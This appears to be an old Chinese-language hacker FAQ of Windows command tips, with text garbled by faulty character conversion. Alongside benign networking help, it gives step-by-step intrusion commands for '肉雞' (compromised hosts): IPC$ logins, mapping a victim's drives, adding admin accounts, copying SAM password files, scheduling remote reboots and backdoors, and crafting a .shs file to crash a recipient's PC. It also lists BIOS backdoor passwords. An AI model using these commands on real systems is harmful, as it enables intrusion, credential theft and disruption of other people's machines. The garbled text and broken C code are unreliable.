如何查看本機所開端口

FIN-WAIT-1：等待遠程TCP鏈接中斷請求，或先前的鏈接中斷請求的確認

FIN-WAIT-2：從遠程TCP等待鏈接中斷請求

CLOSE-WAIT：等待從本地用戶發來的鏈接中斷請求

CLOSING：等待遠程TCP對鏈接中斷的確認

LAST-ACK：等待原來的發向遠程TCP的鏈接中斷請求的確認

TIME-WAIT：等待足夠的時間以確保遠程TCP接收到鏈接中斷請求的確認

CLOSED：沒有任何鏈接狀態

2）如何得到一個IP地址的主機名？

利用ping -a ip 命令查看！再第一行的pinging後面的 『ip』前面的英文就是對方主機名！

一樣道理，利用ping machine_name也能夠獲得對方的ip

得到一個網站的ip地址的方法是：ping www.***.com

好比想知道sohu的ip，就用ping http://www.sohu.com/來查看就能夠了

順便說一句：若是返回：Reply from *.*.*.*: TTL expired in transit的話，呵呵，表明TTL（生命週期）在
傳輸過程當中過時

什麼意思呢？我來解釋一下！

致使這個問題出現的緣由有兩個：1）TTL值過小！TTL值小於你和對方主機之間通過的路由器數目。
2）路由器
數量太多，通過路由器的數量大於TTL值！

呵呵，其實這兩點是一個意思！只不過說法不一樣而已！

3）如何查看本機的ip地址？

用ipconfig來查看就能夠！

也能夠再Windows中的開始菜單，運行中輸入winipcfg，一樣能夠看到本身的ip

ipconfig命令後面若是加一個參數 /all的話，能夠獲得更加詳細的資料，好比DNS、網關等……

4）再使用net命令的時候遇到一些錯誤代碼，如何查看對應的錯誤信息？

用命令 net helpmsg erorr_code來查看就能夠了

好比錯誤代碼爲：88

則查看命令爲：net helpmsg 88 下面有這個錯誤代碼的中文顯示！

5）利用telnet鏈接到對方主機上，想得到一些系統信息，用什麼命令？

set命令能夠很好的完成你所須要收集信息的任務的！

方法：再cmd下直接輸入set（telnet對方主機之後，也是直接set就能夠了～而後可以獲得NNNNN多的信息）

再這裏，computername：呵呵，還用說麼？主機名！

OS＝Windows_NT ：操做系統的類型哦～

path＝C:\perl\bin\ ：（perl的解釋器位置！）

systemDrive=c: 操做系統盤符！

USERNAME=coldcrysky 當前登錄使用機器的用戶

……

（6）跟蹤路由器的命令是什麼？

tracert 格式：tracert ip

中間會列出全部通過的路由器列表！這些路由器若是是暴露再防火牆外面的話，還能夠看到路由的IP哦～呵呵
（這裏又涉及到了另一個問題：爲何要把路由放在防火牆後面？緣由呢，主要有兩點：1）保護路由器！因
爲如今愈來愈多的***和***已經開始瞄準路由器了～若是直接把路由暴露在外面，呵呵，是很是危險的！被DoS
了就很差了啊～呵呵，因此要放在防火牆裏面；2）爲路由器減小負擔！若是全部的過濾功能通通都壓在路由器上
面，呵呵，路由器的負擔就太大了！）

固然，利用pathping也能夠達到一樣效果！格式與tracert同樣！

7）簡單介紹一下cookie！

cookie，又名小甜點。

它的做用：記錄訪問者的一些信息。例如利用cookie記錄你所登錄這個網頁的次數、登錄時曾經輸入的信息……

最多見的是，你們再登錄論壇（郵箱）的時候，常常在輸入第一個字母的時候，每每下面就顯示出了全部在本機
登錄過該論壇（郵箱）的用戶名吧？呵呵，這個就是cookie的做用！

你們在Administrator的cookies目錄中能夠看到不少的記事本文檔吧？這些都是cookie，雖然通過了加密，可是
仔細查找的話，仍然可以看到一些敏感信息！何況如今也已經有了專門查看cookie的軟件！利用這些軟件，你的
隱私將不保哦～

那麼，如何清除cookie呢？通常狀況下，能夠在Internet選項中的常規選項卡中看到一個刪除cookies的按鈕，點
擊就能夠清楚掉了～

除此之外，還要在internet選項中的內容選項卡中找到自動完成按鈕，把裏面的四項都選中！而後點擊清除表單，
清除密碼～

而後到操做系統目錄所在的分區中！進入Winnt（98爲windows）目錄（固然了，這些都是默認的目錄！若是你安
裝的時候更名了，就對應的去相應目錄）以後找到Temporary Internet Files目錄（2000的目錄在c:\Documents
and settings\administrator\Local settings\Temporary Internet Files）98直接到windows目錄下找Temporary Internet Files就能夠了～，找到這個文件夾後，打開！看到裏面有NNNNNNNNNNNN多的文件了麼？呵呵，這些是你
瀏覽過的網頁的記錄（有的時候從網站上面看到漂亮的FLASH，但是不能保存怎麼辦？只要在線瀏覽一遍之後，斷
線到這裏來找*.swf，以後依次打開查看的話，相信你會找到你所須要的FLASH的！），好了，跑題了～繼續說：這
些文件是網站的頁面記錄，直接刪除就能夠了！

另外，有沒有完全禁止cookie的方法呢？

呵呵，固然有了！在IE的Internet選項中，找到隱私選項卡！，把裏面的滑塊拖到最上面，邊上寫着：阻止全部cookie，呵呵，是否是？

另一種方法：找到Windows目錄下的cookies目錄！把裏面的txt文件所有刪除！，最後應該只剩下一個index.dat
文件！以後把這個文件夾設置成只讀就能夠了～

不過，禁止cookie後，大部分的論壇都沒法正常登錄了啊！呵呵，到底禁止不由止就看你本身的了～

8）安裝2000的時候，速度會特別特別特別慢，怎麼加快安裝速度呢？

在DOS上面安裝，應該用98啓動光盤來引導系統！而後按照下面的方法來作，能夠提升安裝速度：

g:\>cd windows -------假設G爲光驅 windows爲98的安裝目錄！
g:\windows>smartdrv -------加載smartdrv程序！加載後沒有任何提示信息！只要不返回錯誤信息就是加載成功
了～這時候安裝2K的話，速度會很快的哦～

 

9）Windows2K密碼忘記了，如何才能進入系統？

Windows2K的用戶配置信息和密碼保存在SAM文件裏！該文件位於：c:\winnt\system32\config目錄中！只要刪除
這個文件就能夠了～

另外，在c:\winnt\repair目錄中也一樣有一個SAM文件（這個是前者的備份！）若是你在登錄肉雞的時候，copy
前面那個目錄中的SAM文件，你會發現COPY不下來！呵呵，爲何？由於運行着的2K系統會保護SAM文件啊～這個
時候你就COPY這個就能夠了！

10)ping不到，tracert不到，可是卻能用nbtstat顯示對方的一些信息，爲何？

由於tracert和ping命令使用的是ICMP協議！而nbtstat是經過對方的netbios端口來得到對方的主機信息的！使
用的是UDP和TCP協議！若是對方僅僅只對ICMP協議作了禁止的話，那經過這個命令得到系統信息是正常的！

11）telnet上去後，如何給對方開共享？

開共享的命令以下：net share c=c:\winnt\system 返回共享成功

以後直接利用\\ip\c來訪問對方的system目錄了～刪除共享用

share c /del 命令就能夠了

12）如何判斷對方的具體操做系統版本？

首先用ver命令查看對方的版本號！

若是是5.00.2195的話，爲2K；5.1.2600爲XP

從這裏能夠區分出來究竟是2K仍是XP了～下面進行更加具體的區分！

2K的pro和svr版本區分：

在telnet下，net shart查看啓動的服務～若是對方開啓了Terminal Services服務的話，基本上能夠判斷爲svr
以上的版本了～若是沒有開啓，則爲pro！（具體方法有三種，由於前幾天在論壇中我回復過暗界了～因此這裏
就再也不重複了～）

XP的pro和home版的區分：

home edition是沒法安裝iis的！因此，能夠經過iis服務來判斷究竟是home版或者是pro了～

固然了，若是對方是pro，可是將iis刪除（停用）的話，就沒辦法判斷了～呵呵

13）如何查看98的隨機啓動的程序？

在98下有一個實用配置程序（msconfig），中文名爲：系統配置實用程序，調用的方法是在：開始--運行中輸入msconfig，在裏面，有一個啓動的選項卡，點擊後，能夠看到不少隨即啓動程序，若是前面帶有鉤的話，就是啓
動時隨機啓動的，取消的話就是把前面的小鉤去掉就能夠了～（若是在這裏查看到了一些未知的啓動文件--好比
沒有文件的具體路徑，或者沒有文件名的話，最好取消它的自啓動！由於頗有多是***！）

除了這裏之外，還有config.sys、autoexec.bat、system.ini、win.ini幾個選項卡，他們分別對應這幾個文件！
只不過在這裏更方便查看而已！

 

14）設置了BIOS密碼，但是卻忘記了，該怎麼辦？

若是是能夠進入Windows的話，能夠找找biospwds和cmospwd這兩個軟件看看～

還有利用DEBUG法：

簡單介紹兩種：

1）-o 70 16
-o 71 13
-q

2）-o 70 16
-o 71 16
-q

另外一種方法：copy法：

copy con cmos.com

輸入下面10個字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格，而後按下F6並回車，
退出，運行這個cmos.com程序就能夠了～

恩，若是不能進入Windows怎麼辦呢？

簡單介紹兩種方法：

1）用通用密碼：

Award Bios密碼：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589

AMI bios密碼：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.

這是常見的密碼，不妨試試～

若是不行的話，能夠利用CMOS放電：

就是把主板上的電池取下來，等一下子再插上去～

15）如何自制一個讓98藍屏的×××？

恩，這個是前幾天QQ上面朋友問個人問題，整理的時候忽然間想起來了，就寫一下好了～

首先，打開Word，再插入菜單中選擇對象，這時，彈出對象包裝程序窗口，再這個窗口中，點擊導入，隨便找一
個文本或者程序就能夠！以後點：編輯菜單。這裏選擇命令行，出現一個命令行窗口，在裏面協商c:\con\con，
點擊保存，完成後，再點編輯包中的複製包，把他隨便到一個地方複製下來，以後看到的是一個名位片段的東西！
給這個文件起一個名字，呵呵，傳給那個可憐的傢伙吧，等待他藍屏，掉線！

（這個命令行中能夠插入不少的命令，不見得非要用這個98藍屏漏洞哦～）順便說一下：這個已經不是什麼新鮮
的技術了，這個技術的名字叫作：碎片對象。呵呵，碎片？記憶碎片麼？不是的！他的後綴是：.shs！之因此說
一下這個，是由於有的朋友還不知道～作一個整理而已！不知道的朋友看事後就知道了，知道的朋友就權當複習
了～另外，不要利用這個方法作破壞！不然後果自負！

16）如何再命令行下殺死對方進程？

利用微軟的2K以上操做系統都是含有這個工具的！該工具包含在2K光盤的\support\tools文件夾下！裏面有安
裝程序，點擊後，就安裝了2K的support tools工具包，裏面有kill這個工具，這時候再cmd下能夠輸入kill/?，
就能夠看到幫助了，使用這個命令的格式是：kill pid （pid是進程的ID號！）再任務管理器中能夠看到進程
的ID號！（不知道有幾位朋友用過藍色火焰？呵呵，用法跟這個一摸同樣！還有不少相似的***、後門軟件都
有相似的功能！這個是windows自帶的大***『後門工具』而已！）

這時候，有朋友問了，那再命令行下如何查看進程呢？呵呵，這就用到了系統自帶的有一個後門工具了：再剛
才說得那個目錄中，還有一個工具叫tlist 看名字就能看出來是幹什麼的吧？用法更簡單！直接輸入tlist就
能夠獲得pid遇隊形程序的列表了～

那對方機器若是沒有安裝這兩個程序怎麼辦呢？不要緊，你把你操做系統盤符下面programfiles\support tools
目錄下面的這兩個對應的exe文件上傳到對方的winnt\system32目錄中就能夠了！呵呵～

17）上次說了ping的基本用法，此次談談ping的命令參數！

這個是本次問題集的重點部分！不管是小鳥仍是老鳥，大家能保證你真的對這些參數瞭如指掌麼？恐怕都未必！
仍是好好看看吧！

這是TCP／IP協議中最有用的命令之一

它給另外一個系統發送一系列的數據包，該系統自己又發回一個響應，這條實用程序對查找遠程主機頗有用，它返
回的結果表示是否能到達主機，宿主機發送一個返回數據包須要多長時間。

Usage： ping ［-t］ ［-a］ ［-n count］ ［-l size］ ［-f］ ［-i TTL］ ［-v TOS］
［-r count］ ［-s count］ ［［-j host-list］ ［-k host-list］］
［-w timeout］ destination-list

Options：

-t Ping the specifed host until interrupted.（除非人爲停止，不然一直ping下去）

-a Resolve addresses to hostnames.（把IP轉爲主機名）

-n count Number of echo requests to send.（響應請求的數量）

-l size Send buffer size.（封包的大小）

-f Set Don`t Fragment flag in packet.（信息包中無碎片）

-i TTL Time To Live.（時間）

-v TOS Type Of Service.（服務類型）

-r count Record route for count hops.

-s count Timestamp for count hops.

-j host-list Loose source route along host-list.

-k host-list Strict source route along host-list.（較嚴格的……唉，怎麼譯好……算了，放着吧）

-w timeout Timeout in milliseconds to wait for each reply.（timeout的時間）

好比你們可能都知道的一個命令 # ping -f -s 65000 ***.***.***.***或者前階段你們所謂ping死黴國佬時所用
的命令（固然這樣只會形成我方本身的網絡阻塞）。

其實這個命令主要是用來看對方應答的速度，若是怎麼ping 獲得的結果都是request time out。那恐怕你根本就
不用你去找這臺主機了，它不在你的射程以內。

18）如何查看本機的DNS服務器？

ipconfig實際上是能夠的（呵呵，上次就介紹過這個命令），除此之外，還能夠利用一個命令：再cmd下輸入netsh，
進入到netsh>提示符，再輸入：int ip 進入到interface ip> 而後再次輸入dump，這時候屏幕上出現當前鏈接的
配置狀況了

這裏必須介紹一下netsh究竟是做什麼用的！這個命令比較複雜，他包含了不少的子命令，因此這裏只對部分命令
進行講解：

1）查看本機IP：首先鍵入netsh，再netsh>提示符下輸入：interface 回車 以後：ip 回車 再以後：show
address 回車 這樣，就能夠看到當前鏈接的IP地址和子網掩碼。（其實這個命令不如ipconfig簡單，也不如ipconfig/all全面）

2）修改網絡配置：接着上面的命令，咱們使用：set address name=「本地鏈接」 source=static
addr=192.168.0.200 mask=255.255.255.0，這樣就修改了當前的IP地址，用show address來看看
（或者用ipconfig）

3）顯示一個完整的網絡配置教本：

剛纔說過，第一個命令顯示的信息不如ipconfig/all全面，不用着急，netsh再打印顯示網絡配置上，仍是有
本身的特點的！例如：再interface ip>狀態下輸入：dump，會顯示一個清單，顯示全部本地鏈接
（無論你是否使用～）與netstat -an不徹底同樣！

這就是netsh的簡單介紹和最基礎的用法！但願你們可以掌握！還能夠輸入？來查看幫助！（要在netsh>提示符
下才能查看幫助啊～）

19）肉雞上的部分文件沒法刪除，怎麼辦？

若是對方的文件夾是隻讀的話，會出現拒絕訪問的字樣！這時候，咱們能夠再del命令後面加上/f參數來刪除！

20）再說一個能夠限制用戶登錄時間的命令！

再net命令中就能夠實現這樣的功能！具體方法以下：

假如咱們打算讓：coldcrysky這個用戶再週日到周易的上午八點到下午四點之間能夠登錄，用這個命令：

net user coldcrysky /timesunday-monday,08:00-16:00

以後利用net user coldcrysky命令來查看登錄時間的限制，能夠看到是咱們所規定的時間（由於是中文的，
很容易懂，我就很少廢話了）

在此，特別提醒各位：命令中：星期日纔是一週的開始！！！不要當成星期一！

光說了怎麼設置，若是想恢復回去怎麼辦呢？（就是恢復成默認狀態，任什麼時候間均可以登錄的狀態）

看個人：net user coldcrysky /time:all --這樣就能夠了～

22)如何刪除windows2K的默認貢獻？

首先打開記事本，輸入以下內容：

net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete

這裏的c$、d$、e$……是表明默認共享的盤符～又幾個就設置幾個就能夠了～

以後點擊保存成批處理文件（後綴爲：bat的文件！）！加入到啓動組中就能夠了～

23）139端口的又一用法

呵呵，寫這個帖子的緣由是由於我答應給一個朋友回覆139端口的做用來着……先聲明兩點：1）不要利用本帖
所提到的方法去搞惡意破壞！2）呵呵，可能許多人已經知道了139端口這個用法了～本文只想起到一個拋磚引
玉的做用！

廢話很少說了～開始：

若是你使用NT主機的話，那你可要注意了！
重啓NT主機的方法以下：

1：Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
創建一個IPC鏈接

2：net use H: \\XXX.XXX.XXX.XXX\C$
將對方的C盤映射爲本身的h盤

3：copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在對方的C盤上生成一個能重啓機器的文件

4：net time \\XXX.XXX.XXX.XXX
獲得對方機器時間

5：at \\XXX.XXX.XXX.XXX 重啓的時間 c:\reboot.bat
設定對方重啓的時間！

6：at \\XXX.XXX.XXX.XXX
查看任務上面是否添加了這個任務

7：等對方重啓好了～

上面的第三步是only for Win2K的，若是是Nt，就須要用意個指定的重啓程序，咱們能夠本身編寫一個
reboot.exe來代替reboot.bat，代碼以下：
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定義重啓的時候發送給全部用戶的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://嘗試用最簡單的API函數重啓
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://由於上面的重啓不成功，因此須要調整本進程的特權
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken))
return FALSE;
文件://獲取重啓的特權 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判斷是NT內核仍是9X內核，選擇用不一樣的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;

對了，再次說明啊，別用本文提到的方法搞破壞，當心警察叔叔打PP～呵呵

24）利用批處理文件來創建一個記錄3389登錄者信息的記錄器

因爲Terminal Service默認是沒有日誌記錄的，只能依靠他的系統日誌，可是系統日誌只能記錄一些大動做
（開啓或中止服務），那麼，如何用批處理文件來編寫一個將是3389端口的程序呢？很簡單：

創建一個批處理文件：內容以下：

@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389

以後保存！

若是有人用你的3389登錄你的機器，呵呵，在c盤下就有3389log.txt這個文件！記錄了當天日誌，還有鏈接
時間……資料～開始反擊～呵呵

25）網絡命令小節

A、NET命令：

IPC鏈接：格式 net use \\對方IP\ipc$ "密碼" user:"用戶名" 『創建IPC鏈接～』
net use \\對方IP\ipc$ /delete 『斷開鏈接～』

如下操做須要在鏈接到對方主機後纔可進行！！！

net user coldcrysky xyz /add 『在鏈接的目標主機中加入一個用戶名爲COLDCRYSKY 密碼爲WYZ的用戶』

net localgroup Administrator coldcrysky /add 『把名爲coldcrysky的用戶加入ADMIN組-覺得着權限的
提升啊！！！^_^』

net use z:\\對方IP\C$ 『把對方的C盤映射爲本機的Z盤-可依照須要更改映射盤符！』
net start telnet 『開啓TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密碼改成COLDCRYSKY』

B、AT命令：

查看遠程機時間：net time \\對方IP

加入一項新任務：

at \\對方IP 時間 文件名 『用來把本身上傳的後門程序在制定時間運行，方便之後進入肉雞！』

C、TELNET命令：

telnet 對方IP 端口 『做用不用我說了吧？？？』

D、FTP命令：

登錄：ftp 對方網址（IP地址）
上傳文件：get 文件在本機完整路徑 對方文件存放完整路徑
下載文件：put 對方文件完整路徑 本機存放文件路徑

E、COPY命令：

在創建鏈接後（尤爲是IPC$鏈接後，頗有用的命令哦～）
⑴copy index.htm \\127.0.0.1\c$\index.htm
『將本機index.htm文件複製到127.0.0.1的C盤下，若是要放到對方的NT目錄下，則把C改成admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『將遠程機數據庫文件拷貝到本機C盤根目錄下』F、SET命令：

主要用於分析目標計算機的基本信息用！具體使用方法請查找相關文件！

G、NBTSTAT命令：

nbtstat -A 對方IP （這個A大寫）

『在其中顯示<037>前面的英文或數字就是計算機名稱！固然，也能夠利用PING -A 對方ip的方法來查看對方主
機名！效果相同！！！』

H、SHUTDOWN命令：

『用來關閉對方NT服務的命令』格式以下：
shutdown \\IP地址 t:20
『20秒後自動關閉對方NT服務！因爲對對方機器影響較大，慎用！！！』

I、DIR命令：